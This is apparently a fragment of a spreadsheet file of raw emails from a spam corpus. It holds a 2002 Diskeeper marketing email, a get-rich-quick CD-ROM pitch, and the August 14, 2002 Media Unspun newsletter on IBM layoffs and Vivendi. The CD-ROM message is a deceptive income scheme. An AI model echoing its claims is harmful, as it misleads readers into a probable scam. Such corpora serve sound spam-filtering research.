 id="AutoNumber3"&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;
             &lt;p align="center"&gt;
 &lt;span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;
             &lt;map name="FPMap0"&gt;
             &lt;area
 href="http://www.buy.com/retail/searchresults.asp?orderby=4&amp;querytype=&amp;qutyp
 e=0&amp;qu=diskeeper&amp;pagereq=1&amp;alpha=&amp;alpha2=&amp;deptid=0&amp;mfgpartno=&amp;mfgid=0&amp;search
 id=0&amp;loc=105&amp;search_store=2" shape="rect" coords="491, 25, 576, 49"&gt;
             &lt;area
 href="http://www2.warehouse.com/search/pppsmainsearch.asp?home=micro&amp;qu=disk
 eeper&amp;imenu=&amp;so=X&amp;Search.x=6&amp;Search.y=12" shape="rect" coords="191, 69, 328,
 101"&gt;
             &lt;area
 href="http://www.pcconnection.com/scripts/searchresults.asp?BasicSrchText=di
 skeeper&amp;SR=1&amp;ER=10&amp;TR=0&amp;ST=BS&amp;PP=0&amp;sortval=Price&amp;plattype=A&amp;Search.x=40&amp;Sear
 ch.y=12" shape="rect" coords="3, 8, 165, 52"&gt;
             &lt;area
 href="http://www.softchoice.com/software/prod_description.asp?5445x$qJpibFSc
 VSPL34dNX1NpKIC7k0y8w2JTWf0TJAZv16neAteuE$2jAUDdqSkqd22U8RG_ODIY1ZVd0ZK2FJBL
 pFHM1p8InrYf$$dQNb9amrhiAmTmLZzs6Jg4VvRqWW09_ng7ABuhLAPrzhNCfBQIlCQ25pKQimn$
 HCmHgoBko9i4bo43b9ggk2ngYvPiimlN6" shape="rect" coords="196, 5, 334, 52"&gt;
             &lt;area
 href="http://www.softwareshelf.com/products/execsoftprod.asp?p=5"
 shape="rect" coords="1, 70, 167, 101"&gt;
             &lt;area
 href="http://www.staples.com/Catalog/Browse/sku.asp?PageType=1&amp;Sku=490710&amp;bc
 Flag=True&amp;bcCatId=0&amp;bcCatName=Software,+Books+&amp;+Training&amp;bcDeptId=1443&amp;bcDep
 tName=Utilities&amp;bcClassId=140505&amp;bcClassName=System+Maintenance"
 shape="rect" coords="362, 4, 459, 50"&gt;
             &lt;area href="http://shop2.outpost.com/product/3196730"
 shape="rect" coords="357, 70, 437, 122"&gt;
             &lt;area href="http://www.asap.com/execsoftware/2001Q11.htm"
 shape="rect" coords="484, 72, 613, 117"&gt;
             &lt;/map&gt;
             &lt;img border="0"
 src="http://www2.execsoft.com/logos_resell_082302.gif" usemap="#FPMap0"
 width="620" height="124"&gt;&lt;/span&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
 &lt;hr noshade color="#E4E4E4"&gt;
 &lt;FONT SIZE="1" FACE="Verdana"&gt;&lt;B&gt;
 &lt;FONT COLOR="#FF0000"&gt;NOTICE:&lt;/FONT&gt;&lt;/B&gt; We periodically send new product
 information electronically or
 survey those individuals who voluntarily give us their e-mail address. We
 hope you enjoy receiving this timely information. However, if you would
 like to remove yourself from this list, please do not reply to this e-mail
 to be removed.&lt;/FONT&gt;&lt;/span&gt;&lt;span style="FONT-FAMILY: Verdana"&gt;&lt;font
 size="1"&gt;
 &lt;/font&gt;&lt;/span&gt;
 &lt;span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;
 &lt;P&gt;&lt;FONT SIZE="1" FACE="Verdana"&gt;You have received this message from
 esi-vp-marketing at the e-mail
 address: eric_koester@ccmail.mckee.com
 &lt;BR&gt; To unsubscribe, send the above e-mail address in the body of a message
 along with your name, on a separate line, to
 &lt;A HREF="mailto:unsubscribe@executive.com?subject=Unsubscribe%20
 eric_koester@ccmail.mckee.com" &gt; unsubscribe@executive.com&lt;/A&gt;.&lt;/FONT&gt;&lt;/P&gt;
 &lt;hr noshade color="#E4E4E4"&gt;
 &lt;p&gt;&lt;font size="1" face="Verdana"&gt; 2002 Executive Software International,
 Inc.
 All Rights Reserved. DISKEEPER, Executive Software and the Executive
 Software
 logo are either registered trademarks or trademarks of Executive Software
 International, Inc. in the United States and/or other countries. Windows
 and
 Windows NT are registered trademarks of Microsoft Corporation in the
 United
 States and/or other countries. All other trademarks and brand names are
 the
 property of the respective owners.&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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Making Serious Money Has Never Been This Easy! [jodra]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 NEW CD ROM is helping to Create HUGE FORTUNES!!
 Free Info:
 * What if you could make a full time income handing/sending 
   out a $1.25 CD ROM?
 * What if the company paid you EVERY DAY?
 * What if it was a New York Stock Exchange Company?
 * What if there was no "real" competition, and everybody 
   needs our service?
 * What if you got paid when somebody goes to your website 
   and views the hottest video presentation ever and signs up?
 If you are the least bit curious about why this CD ROM 
 is making us Fortunes!!
 All you need to do is simply:
 1.Send an email to: mailto:tim33u2@n2mail.com?subject=CD_ROM
 2. Put " CD ROM " in the subject heading
 We will email you all you need to know to get signed up 
 and making money TODAY!!!
 Waiting to hear from you soon!
 GA
 PS.. Please put "Remove" in subject line to get out
 of this list.  Thanks.     
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format...
 ------------=_1029331990-31627-4
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 To view this newsletter in full-color, visit:
 http://newsletter.mediaunspun.com/index000018970.cfm
 M E D I A  U N S P U N
 What the Press is Reporting and Why (www.mediaunspun.com)
 -----------------------------------------------------------------
 August 14, 2002
 -----------------------------------------------------------------
 IN THIS ISSUE
 -----------------------------------------------------------------
 * SEC EXPOSES BIG BLUE'S PINK SLIPS
 * SYNERGY AND BETRAYAL AT VIVENDI
 * OTHER STORIES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ADVERTISEMENT
 -----------------------------------------------------------------
 Ken Fisher offers his Quarterly Report for high net worth
 investors FREE of cost &amp; without obligation. Access the same
 investment research he uses to guide his clients at:
 http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000
 -----------------------------------------------------------------
 SEC EXPOSES BIG BLUE'S PINK SLIPS
 -----------------------------------------------------------------
 Does the Securities and Exchange Commission have a press pass
 yet? It seems to be bringing us all our news lately. On the day
 of the deadline for companies to certify their financial
 statements with the SEC, the business press squirmed and waited
 for the next Enron or WorldCom. (We might eat these words
 tomorrow, but we doubt it.) In an unrelated confession, IBM gave 
 the commission its latest layoff numbers.
 IBM talked about pink slips during its second-quarter earnings
 report, but with a vagueness worthy of your daily horoscope.
 ("Capricorn: Career changes may be on their way...") Only after
 "months of surreptitious layoff notices" did the company admit
 that it's cutting more than 15,600 jobs, said the AP. That's
 about 5% of its workforce, and a lot more than pundits expected. 
 An IBM spokesperson told the Wall Street Journal the higher
 number was due to "rebalancing" and more employees than expected 
 taking voluntary layoffs. 
 Sorry, we're still back on "rebalancing." Did IBM "rightsize"
 last quarter, too?
 IBM's news was still trickling out Wednesday morning, but some
 details were available. About 1,400 workers got cut from IBM's
 microelectronics unit, and most of the rest were from IT
 services and consulting. (That ought to make IBM's new employees 
 from PricewaterhouseCoopers feel all warm and fuzzy inside.)
 Look for news updates from cities that will see the cuts, such
 as Austin and Raleigh. 
 OK, none of this is good. Two years into the tech slump, we're
 still tired of seeing people get sacked. But was it really so
 bad that IBM only revealed it because of new accounting
 regulations? Nah, Big Blue was always known for "stealth
 layoffs," as CNN put it, but current corporate scrutiny forced
 it to 'fess up for once. Until now, IBM would acknowledge the
 latest layoffs if reporters called and asked, but wouldn't give
 specifics. Yeesh. - Jen Muehlbauer
 IBM Cut 5% of Staff in Period, Double the Expected Number
 http://online.wsj.com/article/0,,SB1029282408667791835,00.html
 (Paid subscription required.) 
 IBM to Cut Over 15,000 Employees (AP)
 http://tinyurl.com/10kz
 IBM confirms 15,600 job cuts (Reuters)
 http://www.msnbc.com/news/793777.asp 
 IBM cutting 15,000 jobs 
 http://news.com.com/2100-1001-949677.html
 IBM job cuts exceed 15,600
 http://money.cnn.com/2002/08/13/technology/ibm/index.htm
 IBM puts job cuts at 15,600, with fewer than 50 in this state
 http://seattlepi.nwsource.com/business/82508_ibm14.shtml
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 You've heard about identity management, but do you know about
 the opportunities and business models that will emerge as a
 result? Download a free executive summary of Esther Dyson's coverage of
 identity management in Release 1.0. Learn more about the
 expanding market for these services and applications.
 http://release1.edventure.com/executivesummary.cfm?MCode=Unspun
 -----------------------------------------------------------------
 SYNERGY AND BETRAYAL AT VIVENDI
 -----------------------------------------------------------------
 Synergy always was a fuzzy concept. Now Vivendi Universal's top
 man has slammed the lid on it. The French company announced
 today that it's ready to peddle $9.8 billion in assets to rustle 
 up some cash. First up on the block? Synergy-less U.S. book
 publisher Houghton Mifflin. 
 It's unclear whether new chairman Jean-Rene Fourtou has genuine
 turnaround muscle, or whether he and Vivendi's board are simply
 following the winds of post-merger fashion. But when you owe
 $18.7 billion, you get real practical, real fast. The Guardian
 reported that Vivendi's share price sank 5% on Tuesday when
 investors got the willies about the company's impending
 announcement on its financial health. But the company had
 positive news to report: It's making money. Revenue in the first 
 half was up 13%, higher than analysts' estimates of a 7.7%
 boost. 
 Details are scant on the breadth of Fourtou's restructuring
 efforts, with more information expected at the next board
 meeting on September 25, according to reporters. Houghton
 Mifflin, acquired a year ago for $1.7 billion, and a vague
 explanation that included the "Curious George" character, were
 the only properties named for sale so far. The Guardian
 speculated that Vivendi will also sell its U.S. video games
 business and possibly its stake in the French mobile phone
 company SFR, a debatable sale because of the cash it generates,
 according to the newspaper. 
 Meanwhile, Fourtou's predecessor, Jean-Marie Messier, continues
 to advocate empire-building. The New York Post said its sources
 say Messier hopes his former employer will feel generous enough
 to let him continue to reside in his $17 million Manhattan
 abode. And Bloomberg reported earlier this week that an
 unrepentant Messier is penning a memoir as he vacations in the
 Mediterranean. The working title? "How I Was Betrayed."  -
 Deborah Asbrand 
 Vivendi to Sell Publisher Houghton Mifflin (Reuters)
 http://www.washingtonpost.com/wp-dyn/articles/A15954-2002Aug14.html
 Vivendi investors expect the worst
 http://www.guardian.co.uk/business/story/0,3604,774190,00.html
 Vivendi to Sell $9.8 Billion In Assets, Including Houghton
 http://online.wsj.com/article/0,,SB102931297119161715,00.html
 (Paid subscription required.) 
 Ousted Messier Aims To Score $17m Vivendi Pad
 http://www.nypost.com/business/54701.htm
 Ex-Chief of Vivendi Plans Tell-All Book (Bloomberg)
 http://www.nytimes.com/2002/08/12/business/media/12VIVE.html
 -----------------------------------------------------------------
 OTHER STORIES
 -----------------------------------------------------------------
 A Top AOL Manager Has Left Company
 http://www.nytimes.com/2002/08/14/technology/14AOL.html
 Fed Holds Steady on Interest Rates 
 http://www.washingtonpost.com/wp-dyn/articles/A14636-2002Aug13.html
 Amtrak halts all high-speed service after finding cracks
 http://www.sunspot.net/bal-te.train14aug14.story
 AOL lets resigning exec keep stock options 
 http://www.usatoday.com/money/industries/technology/2002-08-13-aol-pittman_x.htm
 Lucent licensing deal with Winstar focus of probe (AP)
 http://www.bayarea.com/mld/mercurynews/business/3861117.htm
 Study Says Net Could Benefit Music Firms
 http://www.latimes.com/business/la-fi-music14aug14.story
 Eisner Crimping His Own Style
 http://www.latimes.com/business/la-fi-disney14aug14.story
 Severance claims by Enron former execs anger ex-workers
 http://www.chron.com/cs/CDA/story.hts/business/1533657
 Princeton removes dean after Yale Web site flap (AP)
 http://www.siliconvalley.com/mld/siliconvalley/3857890.htm
 Frisbee golf creator dies, may land on someone's roof (SF
 Chronicle)
 http://seattlepi.nwsource.com/national/82560_frisbee14.shtml
 Will Kinsley's Slate Get Wiped?
 http://www.ojr.org/ojr/kramer/1029281360.php
 Hollywood, Russian Bicker Over Bass
 http://www.cnn.com/2002/SHOWBIZ/News/08/13/bassspace.hollywood.ap/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Marketing: Cowpoke Productions (cowpokeproductions.com).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http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org
 To receive future messages in HTML format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Chtm
 To change your subscriber information, use this link:
 http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org
 ------------=_1029331990-31627-4
 Content-Type: text/html; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;title&gt;M E D I A  U N S P U N&lt;/title&gt;
 &lt;!--  
 **********************************************************
 If you can read this message but the rest of the email 
 contains strange characters, your email program is not
 capable of displaying HTML email. Use your browser to read the
 complete newsletter online at: 
    http://newsletter.mediaunspun.com/
 To receive future messages in plain text format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Ctxt
 **********************************************************
 CREATED: August 14, 2002   
 --&gt;
 &lt;meta name="description" content=""&gt;
 &lt;meta name="keywords" content=""&gt;
 &lt;meta name="GENERATOR" content="iMakeNews"&gt;
 &lt;meta name="robots" content="ALL"&gt;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.a226814927149384-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a226814927149384-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927149384-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a226814927149384-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927149384-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927149384-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927149384-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927149384-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a226814927149384-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927149384-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a226814927149384-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a226814927144888-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a226814927144888-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a226814927144888-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a226814927144469-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a226814927144469-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a226814927144469-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a226814927151492-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a226814927151492-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927151492-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a226814927151492-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927151492-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927151492-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927151492-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927151492-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a226814927151492-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927151492-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a226814927151492-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}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 &lt;table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000018970.cfm&amp;XXDESXXissue_id=18970&amp;XXDESXXtitle=M%20E%20D%20I%20A%20%20U%20N%20S%20P%20U%20N"
 			 class="a226814927149384-footer_tellafriend"&gt;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src="http://a298.g.akamai.net/7/298/5382/081402092715/www.imakenews.com/mediaunspun/mediaunspun_logo.GIF" BORDER="0" alt="M E D I A  U N S P U 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Wednesday, August 14, 2002
 				&lt;/font&gt;
 			&lt;/td&gt;
 				&lt;td align="center" width="34%"&gt;
 			&lt;/td&gt;
 				&lt;td align="right" width="33%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 			&lt;!-- COLUMN: 1 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;table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HREF="#a87727"
 						class="a226814927144888-contents_article_title"
 				&gt;
 			SEC Exposes Big Blue's Pink Slips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HREF="#a87728"
 						class="a226814927144469-contents_article_title"
 				&gt;
 			Synergy and Betrayal at Vivendi
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		 &lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a87730"
 						class="a226814927144469-contents_article_title"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&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Media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&lt;P&gt;Ken Fisher offers his Quarterly Report for high net worth investors FREE of cost &amp; without obligation. Access the same investment research he uses to guide his clients at:&lt;br&gt;
 &lt;A HREF="http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000"&gt;http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000&lt;/A&gt;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name="a87727"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			SEC Exposes Big Blue's Pink Slips
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Does the Securities and Exchange Commission have a press pass yet? It seems to be bringing us all our news lately. On the day of the deadline for companies to certify their financial statements with the SEC, the business press squirmed and waited for the next Enron or WorldCom. (We might eat these words tomorrow, but we doubt it.) In an unrelated confession, IBM gave the commission its latest layoff numbers.&lt;/P&gt;&lt;P&gt;
 IBM talked about pink slips during its second-quarter earnings report, but with a vagueness worthy of your daily horoscope. ("Capricorn: Career changes may be on their way...") Only after "months of surreptitious layoff notices" did the company admit that it's cutting more than 15,600 jobs, said the AP. That's about 5% of its workforce, and a lot more than pundits expected. An IBM spokesperson told the Wall Street Journal the higher number was due to "rebalancing" and more employees than
 expected taking voluntary layoffs. &lt;/P&gt;&lt;P&gt;
 Sorry, we're still back on "rebalancing." Did IBM "rightsize" last quarter, too?&lt;/P&gt;&lt;P&gt;
 IBM's news was still trickling out Wednesday morning, but some details were available. About 1,400 workers got cut from IBM's microelectronics unit, and most of the rest were from IT services and consulting. (That ought to make IBM's new employees from PricewaterhouseCoopers feel all warm and fuzzy inside.) Look for news updates from cities that will see the cuts, such as Austin and Raleigh. &lt;/P&gt;&lt;P&gt;
 OK, none of this is good. Two years into the tech slump, we're still tired of seeing people get sacked. But was it really so bad that IBM only revealed it because of new accounting regulations? Nah, Big Blue was always known for "stealth layoffs," as CNN put it, but current corporate scrutiny forced it to 'fess up for once. Until now, IBM would acknowledge the latest layoffs if reporters called and asked, but wouldn't give specifics. Yeesh. - Jen Muehlbauer&lt;/P&gt;&lt;P&gt;
 IBM Cut 5% of Staff in Period, Double the Expected Number&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1029282408667791835,00.html"&gt;http://online.wsj.com/article/0,,SB1029282408667791835,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.) &lt;/P&gt;&lt;P&gt;
 IBM to Cut Over 15,000 Employees (AP)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/10kz"&gt;http://tinyurl.com/10kz&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 IBM confirms 15,600 job cuts (Reuters)&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/793777.asp"&gt;http://www.msnbc.com/news/793777.asp&lt;/A&gt;  &lt;/P&gt;&lt;P&gt;
 IBM cutting 15,000 jobs &lt;br&gt;
 &lt;A HREF="http://news.com.com/2100-1001-949677.html"&gt;http://news.com.com/2100-1001-949677.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 IBM job cuts exceed 15,600&lt;br&gt;
 &lt;A HREF="http://money.cnn.com/2002/08/13/technology/ibm/index.htm"&gt;http://money.cnn.com/2002/08/13/technology/ibm/index.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 IBM puts job cuts at 15,600, with fewer than 50 in this state&lt;br&gt;
 &lt;A HREF="http://seattlepi.nwsource.com/business/82508_ibm14.shtml"&gt;http://seattlepi.nwsource.com/business/82508_ibm14.shtml&lt;/A&gt; &lt;/P&gt;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You've heard about identity management, but do you know about the opportunities and business models that will emerge as a result? &lt;a href="http://release1.edventure.com/executivesummary.cfm?MCode=Unspun"&gt;Download&lt;/a&gt; a free executive summary of Esther Dyson's coverage of identity management in Release 1.0. Learn more about the expanding market for these services and applications.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name="a87728"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Synergy and Betrayal at Vivendi
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Synergy always was a fuzzy concept. Now Vivendi Universal's top man has slammed the lid on it. The French company announced today that it's ready to peddle $9.8 billion in assets to rustle up some cash. First up on the block? Synergy-less U.S. book publisher Houghton Mifflin. &lt;/P&gt;&lt;P&gt;
 It's unclear whether new chairman Jean-Rene Fourtou has genuine turnaround muscle, or whether he and Vivendi's board are simply following the winds of post-merger fashion. But when you owe $18.7 billion, you get real practical, real fast. The Guardian reported that Vivendi's share price sank 5% on Tuesday when investors got the willies about the company's impending announcement on its financial health. But the company had positive news to report: It's making money. Revenue in the first half was 
 up 13%, higher than analysts' estimates of a 7.7% boost. &lt;/P&gt;&lt;P&gt;
 Details are scant on the breadth of Fourtou's restructuring efforts, with more information expected at the next board meeting on September 25, according to reporters. Houghton Mifflin, acquired a year ago for $1.7 billion, and a vague explanation that included the "Curious George" character, were the only properties named for sale so far. The Guardian speculated that Vivendi will also sell its U.S. video games business and possibly its stake in the French mobile phone company SFR, a debatable
 sale because of the cash it generates, according to the newspaper. &lt;/P&gt;&lt;P&gt;
 Meanwhile, Fourtou's predecessor, Jean-Marie Messier, continues to advocate empire-building. The New York Post said its sources say Messier hopes his former employer will feel generous enough to let him continue to reside in his $17 million Manhattan abode. And Bloomberg reported earlier this week that an unrepentant Messier is penning a memoir as he vacations in the Mediterranean. The working title? "How I Was Betrayed."  - Deborah Asbrand &lt;/P&gt;&lt;P&gt;
 Vivendi to Sell Publisher Houghton Mifflin (Reuters)&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A15954-2002Aug14.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A15954-2002Aug14.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi investors expect the worst&lt;br&gt;
 &lt;A HREF="http://www.guardian.co.uk/business/story/0,3604,774190,00.html"&gt;http://www.guardian.co.uk/business/story/0,3604,774190,00.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi to Sell $9.8 Billion In Assets, Including Houghton&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB102931297119161715,00.html"&gt;http://online.wsj.com/article/0,,SB102931297119161715,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.) &lt;/P&gt;&lt;P&gt;
 Ousted Messier Aims To Score $17m Vivendi Pad&lt;br&gt;
 &lt;A HREF="http://www.nypost.com/business/54701.htm"&gt;http://www.nypost.com/business/54701.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Ex-Chief of Vivendi Plans Tell-All Book (Bloomberg)&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/12/business/media/12VIVE.html"&gt;http://www.nytimes.com/2002/08/12/business/media/12VIVE.html&lt;/A&gt; &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		 &lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	 &lt;a name="a87730"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Other Stories
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;A Top AOL Manager Has Left Company&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/14/technology/14AOL.html"&gt;http://www.nytimes.com/2002/08/14/technology/14AOL.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Fed Holds Steady on Interest Rates &lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A14636-2002Aug13.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A14636-2002Aug13.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Amtrak halts all high-speed service after finding cracks&lt;br&gt;
 &lt;A HREF="http://www.sunspot.net/bal-te.train14aug14.story"&gt;http://www.sunspot.net/bal-te.train14aug14.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 AOL lets resigning exec keep stock options &lt;br&gt;
 &lt;A HREF="http://www.usatoday.com/money/industries/technology/2002-08-13-aol-pittman_x.htm"&gt;http://www.usatoday.com/money/industries/technology/2002-08-13-aol-pittman_x.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Lucent licensing deal with Winstar focus of probe (AP)&lt;br&gt;
 &lt;A HREF="http://www.bayarea.com/mld/mercurynews/business/3861117.htm"&gt;http://www.bayarea.com/mld/mercurynews/business/3861117.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Study Says Net Could Benefit Music Firms&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-music14aug14.story"&gt;http://www.latimes.com/business/la-fi-music14aug14.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Eisner Crimping His Own Style&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-disney14aug14.story"&gt;http://www.latimes.com/business/la-fi-disney14aug14.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;
 Severance claims by Enron former execs anger ex-workers&lt;br&gt;
 &lt;A HREF="http://www.chron.com/cs/CDA/story.hts/business/1533657"&gt;http://www.chron.com/cs/CDA/story.hts/business/1533657&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Princeton removes dean after Yale Web site flap (AP)&lt;br&gt;
 &lt;A HREF="http://www.siliconvalley.com/mld/siliconvalley/3857890.htm"&gt;http://www.siliconvalley.com/mld/siliconvalley/3857890.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Frisbee golf creator dies, may land on someone's roof (SF Chronicle)&lt;br&gt;
 &lt;A HREF="http://seattlepi.nwsource.com/national/82560_frisbee14.shtml"&gt;http://seattlepi.nwsource.com/national/82560_frisbee14.shtml&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Will Kinsley's Slate Get Wiped?&lt;br&gt;
 &lt;A HREF="http://www.ojr.org/ojr/kramer/1029281360.php"&gt;http://www.ojr.org/ojr/kramer/1029281360.php&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Hollywood, Russian Bicker Over Bass&lt;br&gt;
